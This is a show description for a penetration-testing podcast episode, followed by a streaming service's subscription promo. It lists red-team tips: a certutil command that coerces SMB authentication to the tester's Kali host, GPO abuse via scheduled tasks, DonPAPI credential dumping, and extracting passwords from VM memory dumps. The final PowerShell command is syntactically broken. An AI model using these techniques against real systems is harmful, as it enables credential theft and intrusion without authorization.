7MS #632: Tales of Pentest Pwnage – Part 59

Today’s tale of pentest pwnage includes some fun stuff, including:

- SharpGPOAbuse helps abuse vulnerable GPOs! Try submitting a harmless POC first via a scheduled task – like ping -n 1 your.kali.ip.address. When you’re ready to fire off a task that coerces SMB auth, try certutil -syncwithWU \\your.kali.ip.address\arbitrary-folder.
- I’m not 100% sure on this, but I think scheduled tasks capture Kerberos tickets temporarily to workstation(s). If you’re on a compromised machine, try Get-ScheduledTask -taskname "name" | select * to get information about what context the attack is running under.
- DonPAPI got an upgrade recently with a focus on evasion!
- When attacking vCenter (see our past YouTube stream for a walkthrough), make sure you’ve got the vmss2core utility, which I couldn’t find anywhere except the Internet Archive. Then I really like to follow this article to pull passwords from VM memory dumps.
- Can’t RDP into a victim system that you’re PSRemote’d into? Maybe RDP is listening on an alternate port! Try Get-ItemProperty -path "HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp | select-object portnumber`

And if you want to hang around until the very end, you can hear me brag about my oldest son who just became an EMT!

Oppdag Premium

Prøv 14 dager gratis

Hør populære podkaster som Storefri med Mikkel og Herman, Ida med hjertet i hånden, Krimpodden og mye mye mer

I appen skaper du ditt eget bibliotek med favoritter, og vi gir deg også anbefalinger til podkaster du ikke kan gå glipp av.

Dersom du er ny Podme-bruker får du 14 dager gratis prøveperiode når du oppretter abonnement

kr 99/mnd

kr 129/mnd

Ubegrenset tilgang til alle dine favorittpodkaster